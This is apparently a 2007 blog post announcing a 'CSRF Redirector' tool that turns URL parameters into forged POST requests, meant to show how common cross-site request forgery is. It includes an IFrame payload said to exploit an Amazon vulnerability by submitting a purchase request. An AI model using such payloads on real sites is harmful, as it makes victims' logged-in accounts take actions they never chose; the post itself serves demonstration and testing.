CSRF Redirector
17 Jul 2007Inspired by the XSS POST Forwarder, I just created the CSRF Redirector. It's a simple tool that makes it easy to test CSRF using POST, hopefully demonstrating how prevalent CSRF vulnerabilities are as well as reducing the misconception that forging a POST request is complicated.
To use it, construct a URL of the form http://shiflett.org/csrf.php?csrf=URL
&NAME
=VALUE
, where URL
is the (URL-encoded) target site, and NAME
and VALUE
represent a name-value pair, of which there can be zero or more.
For example, the following IFrame exploits the Amazon vulnerability:
<iframe src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />
I may add more features at some point. Until then, enjoy!